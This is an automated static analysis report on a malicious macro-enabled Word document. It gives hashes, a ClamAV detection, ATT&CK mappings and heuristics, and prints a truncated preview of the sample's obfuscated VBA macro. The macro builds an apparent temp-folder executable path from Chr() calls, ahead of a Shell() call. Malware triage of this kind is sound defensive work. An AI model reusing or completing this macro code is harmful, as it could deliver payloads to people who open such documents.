Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 4a5edcbe2fc3d423…

MALICIOUS

Office (OOXML)

25.2 KB Created: 2016-09-16 15:29:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2019-01-12
MD5: b0de85d0884e903b40a12022aec4a723 SHA-1: 5f7111691a9b75f4985f0e83df946ded21f8cfd9 SHA-256: 4a5edcbe2fc3d42303baae4630a7591d223e882c690a7dacb7fbd332f61a2f0d
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Macro.Valyria-6388352-1. Static analysis revealed the presence of a VBA project with a Document_Open macro and a critical Shell() call, indicating an attempt to execute arbitrary code. The VBA code is heavily obfuscated, but the presence of these indicators strongly suggests the macro is designed to download and execute a secondary payload.

Heuristics 5

  • ClamAV: Doc.Macro.Valyria-6388352-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Valyria-6388352-1
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 11871 bytes
SHA-256: 73c9b598c397fad341ae33fbedac71975308667fcbc6e32106ed7cd1fa7133cd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const aNMPbQOwnjl As String = "leNzJQ"
Private Const lYOiQQGdgODv As String = "fFCRoX"
Private Const NCrwYonWwMYP As String = "plTaaN"
Private Const BBEJqAbswada As String = "rQnkKK"
Private Const mjMPDQhZYukU As String = "eXQkNY"

Dim UNUkrg As String
Dim xkzClE As Double
Dim hZYukU As Currency
Dim KklBs As Variant
Dim bswada As Integer
Dim nWwMYP As Variant
Dim nQxweP As Integer
Dim gxleDV As Variant
Dim fOHWZUiVM As String
Dim OuaJnn As Integer
Dim qdDnpL As String
Dim GdgODv As Double
Dim QOwnjl As Currency

Function BwEtwB(ByVal tkJOGI As Integer)
If tkJOGI = "MUFPxp" Then
mLygkP = "nyjdFO"
End Function

Sub iWGYtT()
Dim SMfRrk As Integer
Dim JIYmt As String
End Sub

Sub KhCbFqzZ()
msRVp = 28 + 68
End Sub
Sub nqIKtnqL()
RuHRr = 19 + 7
End Sub
Sub GUxkvuRM()
SajnW = 66 + 40
End Sub
Sub VoxpdFwR()
imTFT = 85 + 57
End Sub
Sub LOoIgpJM()
GPyTB = 89 + 65
End Sub
Sub NcCKnNlG()
KVwjW = 32 + 75
End Sub
Sub qEWMzKRF()
VEhM = 62 + 18
End Sub
Sub xSaCldVx()
dFslN = 96 + 83
End Sub
Sub OgsPlmcX()
rrHJU = 19 + 23
End Sub
Sub qyPlKkoY()
UBNsI = 13 + 4
End Sub
Sub bZPPiZZV()
nfBSJ = 26 + 57
End Sub
Sub bfXqXzCB()
odtHO = 74 + 70
End Sub
Sub wYiebEye()
sZsqv = 17 + 42
End Sub
Sub jZECoqX()
gRxcY = 89 + 49
End Sub
Sub eykJXWOu()
JuSek = 85 + 11
End Sub
Sub jTFmuqnB()
QHWUW = 21 + 19
End Sub
Sub hArTuTcI()
vqxx = 11 + 78
End Sub
Sub tFVLahml()
JnKCv = 34 + 56
End Sub
Sub wdhuVEid()
IjUxx = 85 + 73
End Sub
Sub usFIvfgY()
IqbZm = 36 + 28
End Sub


Sub Execute()
Dim fFCRoX As Double
Dim NCrwYo As String
IUWAPshqs = IUWAPshqs & Chr(45)
fOHWZUiVM = fOHWZUiVM & Chr(101)
jVNxqRgic = jVNxqRgic & Chr(86)
ynFrdCSFA = ynFrdCSFA & Chr(22)
fOHWZUiVM = fOHWZUiVM & Chr(120)
HrkkitHCu = HrkkitHCu & Chr(62)
FMQZyvidd = FMQZyvidd & Chr(97)
fOHWZUiVM = fOHWZUiVM & Chr(101)
wTjNhEOfh = wTjNhEOfh & Chr(37)
crDzbYfLa = crDzbYfLa & Chr(71)
fOHWZUiVM = fOHWZUiVM & Chr(46)
BKinyARp = BKinyARp & Chr(9)
BFKzhykQN = BFKzhykQN & Chr(49)
fOHWZUiVM = fOHWZUiVM & Chr(122)
JRFeXrvbm = JRFeXrvbm & Chr(87)
FuBGZutRA = FuBGZutRA & Chr(20)
fOHWZUiVM = fOHWZUiVM & Chr(69)
vIlhtEtgj = vIlhtEtgj & Chr(57)
MTMounJpd = MTMounJpd & Chr(95)
fOHWZUiVM = fOHWZUiVM & Chr(113)
XPbuOddYr = XPbuOddYr & Chr(38)
Vcqxtejlv = Vcqxtejlv & Chr(75)
fOHWZUiVM = fOHWZUiVM & Chr(89)
cwCPVYPKz = cwCPVYPKz & Chr(11)
JMGNerLcN = JMGNerLcN & Chr(47)
fOHWZUiVM = fOHWZUiVM & Chr(92)
yiGbjCiGb = yiGbjCiGb & Chr(82)
zfpFrBwrV = zfpFrBwrV & Chr(24)
fOHWZUiVM = fOHWZUiVM & Chr(37)
WEdNadIZu = WEdNadIZu & Chr(58)
GEznNuNPy = GEznNuNPy & Chr(100)
fOHWZUiVM = fOHWZUiVM & Chr(112)
LgcrZpPCh = LgcrZpPCh & Chr(32)
djnMqXJxv = djnMqXJxv & Chr(73)
fOHWZUiVM = fOHWZUiVM & Chr(109)
DsuwCxeDK = DsuwCxeDK & Chr(12)
RSCcajmoN = RSCcajmoN & Chr(45)
fOHWZUiVM = fOHWZUiVM & Chr(101)
YeyIQbxzm = YeyIQbxzm & Chr(83)
HmlTotXCV = HmlTotXCV & Chr(22)
fOHWZUiVM = fOHWZUiVM & Chr(116)
xAUuIDYSE = xAUuIDYSE & Chr(59)
NLwCJmoby = NLwCJmoby & Chr(97)
fOHWZUiVM = fOHWZUiVM & Chr(37)
mcTYHOevr = mcTYHOevr & Chr(34)
lpjbmPkIv = lpjbmPkIv & Chr(71)
fOHWZUiVM = fOHWZUiVM & Chr(38)
domckXtwU = domckXtwU & Chr(13)
KEpbsppOi = KEpbsppOi & Chr(50)
fOHWZUiVM = fOHWZUiVM & Chr(101)
zapoyBMsw = zapoyBMsw & Chr(84)
OthiklyOV = OthiklyOV & Chr(20)
fOHWZUiVM = fOHWZUiVM & Chr(120)
XwMbpcnLP = XwMbpcnLP & Chr(60)
VSsQFfOmy = VSsQFfOmy & Chr(95)
fOHWZUiVM = fOHWZUiVM & Chr(101)
MYLFontoC = MYLFontoC & Chr(35)
ebWZEVoiQ = ebWZEVoiQ & Chr(76)
fOHWZUiVM = fOHWZUiVM & Chr(46)
SFnZvigaJ = SFnZvigaJ & Chr(8)
SKmqpiQai = SKmqpiQai & Chr(48)
fOHWZUiVM = fOHWZUiVM & Chr(122)
aWhVfabkH = aWhVfabkH & Chr(86)
IeUhDsBoq = IeUhDsBoq & Chr(25)
fOHWZUiVM = fOHWZUiVM & Chr(69)
ytEIXCCEZ = ytEIXCCEZ & Chr(62)
PDfPYl
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 34304 bytes
SHA-256: fd3e404120999d68d5777cbd23ed03ba78a437027cf2662c50839ed531b8ee5d
Detection
ClamAV: Doc.Macro.Valyria-6388352-1
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.